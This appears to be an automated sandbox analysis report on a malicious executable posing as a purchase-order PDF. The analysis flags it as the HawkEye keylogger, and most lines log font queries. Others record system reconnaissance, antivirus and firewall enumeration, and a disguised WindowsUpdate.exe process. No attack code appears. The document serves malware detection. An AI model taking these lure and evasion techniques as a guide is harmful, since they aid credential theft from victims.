              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00401B74
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,2_2_0040724C
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeCode function: 0_2_00B0E962 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00B0E962
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00406278 GetVersionExA,2_2_00406278
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: PO 2010029_pdf Quotation from Alibaba Ale.exe, 00000000.00000002.301923048.0000000001677000.00000004.00000020.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information:

              barindex
              Yara detected HawkEye KeyloggerShow sources
              Source: Yara matchFile source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 4848, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: WindowsUpdate.exe PID: 6328, type: MEMORY
